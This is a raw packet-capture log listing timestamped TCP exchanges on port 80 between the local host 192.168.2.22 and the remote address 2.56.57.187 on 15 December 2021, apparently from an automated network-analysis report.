Dec 15, 2021 14:47:52.464704990 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464731932 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464739084 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464747906 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464782953 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464783907 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464818001 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.464824915 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.464862108 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.468214989 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.468755007 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.481530905 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.481570005 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.481607914 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.481633902 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.481646061 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.481676102 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.481681108 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.481683969 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.481684923 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.481722116 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.481723070 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.481777906 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.481780052 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.481817961 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490313053 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490371943 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490411043 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490447998 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490489960 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490516901 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490530968 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490549088 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490573883 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490576029 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490614891 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490616083 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490659952 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490672112 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490700006 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490735054 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490742922 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490782022 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490792036 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490797043 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490823030 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490834951 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490864038 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490869999 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490905046 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490911007 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490947008 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490952969 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.490986109 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.490992069 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491025925 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491036892 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491066933 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491070986 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491106033 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491111040 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491146088 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491153002 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491185904 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491197109 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491226912 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491231918 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491266966 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491272926 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491303921 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491316080 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491344929 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491349936 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491384029 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491394997 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491422892 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491435051 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491461992 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491468906 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491501093 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491512060 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491540909 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491548061 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491581917 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491586924 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491620064 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491631985 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491660118 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491667032 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491699934 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491713047 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491740942 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491745949 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491780996 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491794109 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491821051 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491827011 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491861105 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491868019 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491902113 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491906881 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491940022 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491950035 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.491981983 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.491993904 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492021084 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492032051 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492058992 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492069960 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492099047 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492104053 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492136955 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492147923 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492177010 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492181063 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492217064 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492228031 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492255926 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492265940 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492295980 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492302895 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492335081 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492340088 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492372036 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492382050 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492410898 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492415905 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492449999 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492464066 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492489100 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492496967 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492528915 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.492533922 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.492578983 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.493185997 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.507333040 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.507376909 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.507415056 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.507453918 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.507491112 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.507529020 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.507534027 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.507566929 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.507567883 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.507572889 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.507575989 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.507626057 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.517844915 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.517885923 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.517918110 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.517949104 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.517981052 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518018007 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518057108 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518100023 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518101931 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518141985 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518143892 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518146992 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518182993 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518188953 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518223047 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518234968 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518280029 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518285990 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518316984 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518318892 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518354893 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518358946 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518400908 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518409014 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518436909 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518440962 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518464088 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518479109 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518498898 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518521070 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518536091 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518560886 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518573046 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518604040 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518623114 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518644094 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518667936 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518682957 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518702030 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518724918 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518728971 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518769979 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518793106 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518809080 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518824100 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518848896 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518867016 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518892050 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518897057 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518933058 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518954039 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.518975019 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.518986940 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519015074 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519016027 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519056082 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519083023 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519095898 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519110918 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519135952 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519136906 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519175053 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519192934 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519217014 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519222975 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519254923 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519269943 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519295931 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519313097 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519334078 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519339085 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519375086 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519393921 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519414902 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519428015 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519454956 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519469976 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519494057 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519506931 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519535065 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519556046 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519576073 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519613028 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519614935 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519639015 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519654036 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519679070 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519695997 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519712925 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519740105 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519742966 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519777060 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519798040 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519815922 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519826889 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519855976 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519871950 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519892931 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519903898 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519932032 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519934893 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.519973993 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.519990921 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.520013094 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.520020008 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.520052910 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.520065069 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.520092010 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.520112038 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.520133972 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.520140886 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.520173073 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.520190954 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.520210981 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.520219088 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.520268917 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.521775007 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.533116102 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.533181906 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.533225060 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.533265114 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.533302069 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.533339024 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.533366919 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.533376932 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.533404112 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.533406973 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.533411026 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.533416986 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.533427000 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.533461094 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.533555031 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.545840025 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.545902014 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.545945883 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.545984983 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546021938 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546092033 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546109915 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546128035 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546149015 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546190023 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546201944 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546206951 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546210051 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546231031 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546251059 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546269894 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546288967 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546312094 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546338081 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546353102 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546367884 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546391010 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546413898 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546432018 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546447992 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546469927 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546493053 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546509981 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546529055 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546550989 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546569109 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546588898 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546605110 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546629906 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546648026 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546669960 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546685934 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546709061 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546725035 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546753883 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546771049 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546793938 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546803951 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546834946 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546850920 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546875954 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546896935 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546914101 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546931982 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546953917 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.546969891 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.546993971 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547009945 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547033072 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547049999 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547089100 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547113895 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547130108 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547147036 CET	49165	80	192.168.2.22	2.56.57.187
Dec 15, 2021 14:47:52.547168016 CET	80	49165	2.56.57.187	192.168.2.22
Dec 15, 2021 14:47:52.547187090 CET	49165	80	192.168.2.22	2.56.57.187
